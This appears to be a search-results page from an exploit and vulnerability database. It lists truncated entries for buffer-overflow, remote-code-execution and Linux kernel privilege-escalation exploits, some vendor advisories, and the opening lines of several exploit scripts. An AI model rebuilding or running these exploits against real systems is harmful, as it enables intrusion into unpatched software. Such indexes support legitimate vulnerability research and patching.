954 matches found
VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit
Exploit for windows platform in category remote exploits from socket import from struct import pack from time import sleep host = "192.168.0.1" port = 80 s = socketAFINET, SOCKSTREAM s.bindhost, port s.listen1 print "\n+ Listening on %d ..." % port cl, addr = s.accept print "+ Connection accepted...
Kingsoft Office Writer 2012 8.1.0.3385 Buffer Overflow
Kingsoft Office Writer 2012 version 8.1.0.3385 SEH buffer overflow exploit that creates a malicious .wps file that pops calc.exe. !/usr/bin/python Exploit Title: Kingsoft Office Writer v2012 8.1.0.3385 .wps Buffer Overflow Exploit SEH Version: 2012 8.1.0.3385 Date: 2013-11-27 Author: Julien Ahren...
XADV-2013003 Linux Kernel fbdev Driver arcfb_write() Overflow
+----------------------------------------------------------------+ | XADV-2013003 Linux Kernel fbdev Driver arcfbwrite Overflow | +----------------------------------------------------------------+ Vulnerable versions: - linux kernel 3.12 = - linux kernel 2.6.x Testbed: linux kernel 2.6.18 Type:...
php: xml_parse_into_struct buffer overflow when parsing deeply nested XML
ext/xml/xml.c in PHP before 5.3.27 does not properly consider parsing depth, which allows remote attackers to cause a denial of service heap memory corruption or possibly have unspecified other impact via a crafted document that is processed by the xmlparseintostruct function...
MinaliC WebServer 2.0.0 - Remote Buffer Overflow
!/usr/bin/env python Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 Tested on: Windows XP Pro SP2, English Description: Remote command...
RHEL 6 : gdb (RHSA-2013:0522)
Updated gdb packages that fix one security issue and three bugs are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity...
Moderate: Red Hat Security Advisory: gdb security and bug fix update
Updated gdb packages that fix one security issue and three bugs are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity...
Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Howto: Use the app to open the .pxs file from struct import pack file="exploit.pxs" head = "\x50\x68\x6F\x74\x6F\x64\x65\x78\x20\x50\x72\x65\x73\x65\x6E\x74\x65\x72\x20\x53"+...
Linux Kernel Sendpage Local Privilege Escalation
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' require 'msf/core/post/common' require...
Linux Kernel epoll Subsystem “eventpoll.c”多个本地拒绝服务漏洞
BUGTRAQ ID: 46630 CVE ID: CVE-2011-1082,CVE-2011-1083 Linux Kernel是Linux操作系统的内核。 Linux Kernel 2.6.38之前版本的fs/eventpoll.c在epoll子系统的实现上存在本地拒绝服务安全漏洞,将epoll文件描述符放置在其他epoll数据结构中,没有检查已关闭的循环或深链接,攻击者可利用此漏洞造成拒绝服务 0 Linux kernel 2.6.38 厂商补丁: Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.kernel.or...
Reverse Engineering SEHOP Chain Validation
Reverse Engineering code of SEHOP Chain Validation by x90c [email protected] -- sehopchainvalidation.c -- typedef struct EXCEPTIONREGISTRATIONRECORD struct EXCEPTIONREGISTRATIONRECORD Next; PEXCEPTIONROUTINE Handler; EXCEPTIONREGISTRATIONRECORD, PEXCEPTIONREGISTRATIONRECORD; / first ER struct o...
Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak
/ Linux include include include include include define DEVICE "/dev/ttyS1" int mainint argc, char argv int ret = 0; int i, fd, reservedsize; char buf; struct serialmultiportstruct buffer; printf"\m/ Linux \n", argv0; exit-1; if argc 2 if reservedsize = atoiargv2 == 0 fprintfstderr, " - Sorry: ato...
Freefloat FTP Server - Remote Buffer Overflow (DEP Bypass)
Freefloat FTP Server - Remote Buffer Overflow DEP Bypass !/usr/bin/python import socket, sys from struct import pack print "\n===============================" print "Freefloat FTP Server DEP Bypass" print " Written by Blake " print "===============================\n" if lensys.argv != 3: print "...
Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability
Exploit for windows platform in category remote exploits !/usr/bin/env python part of femtocell research by TU-Berlin only for educational purposes Exploit Title: remote root on sfr/ubiquisys femtocell webserver wsal/shttpd/mongoose Author: nion Software: http://code.google.com/p/mongoose/...
Linux Kernel 2.6.283.0 (DEC Alpha Linux) - Local Privilege Escalation
Linux Kernel 2.6.283.0 DEC Alpha Linux - Local Privilege Escalation / DEC Alpha Linux include include include include include include include include include include define SYSosfwait4 7 define SOCKOFFSET 552 / Offset of skdestruct fptr in sock struct, change for your kernel / define PAGESIZE 819...
CVE-2011-0989
The RuntimeHelpers.InitializeArray method in metadata/icall.c in Mono, when Moonlight 2.x before 2.4.1 or 3.x before 3.99.3 is used, does not properly restrict data types, which allows remote attackers to modify internal read-only data structures, and cause a denial of service plugin crash or...
Wordtrainer 3.0 Buffer Overflow
!/usr/bin/python +Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability +Date: 12\04\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.wordtrainer.net/software/files/wt307shwexe/wt307shw.exe +Version: 3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/A from struct impo...
Microsoft Windows XP - afd.sys Local Kernel Denial of Service
Microsoft Windows XP - afd.sys Local Kernel Denial of Service //////////////////////////////////////////////////////////////////////////// // // Title: Microsoft Windows xp AFD.sys Local Kernel DoS Exploit // Author: Lufeng Li of Neusoft Corporation // Vendor: www.microsoft.com // Vulnerable:...
Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak
Linux Kenel 2.6.37-rc1 - serialcore TIOCGICOUNT Leak / Linux include include include include include include int mainint argc, char argv int fd, ret = 0, i; struct serialicounterstruct buffer; printf" Linux = 2.6.37-rc1 serialcore TIOCGICOUNT leak exploit\n"; ifargc 2 printf" You need to supply a...
Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak
/ Linux include include include include include include int mainint argc, char argv int fd, ret = 0, i; struct serialicounterstruct buffer; printf" Linux = 2.6.37-rc1 serialcore TIOCGICOUNT leak exploit\n"; ifargc 2 printf" You need to supply a device name e.g. /dev/ttyS0\n"; exit-1; ;...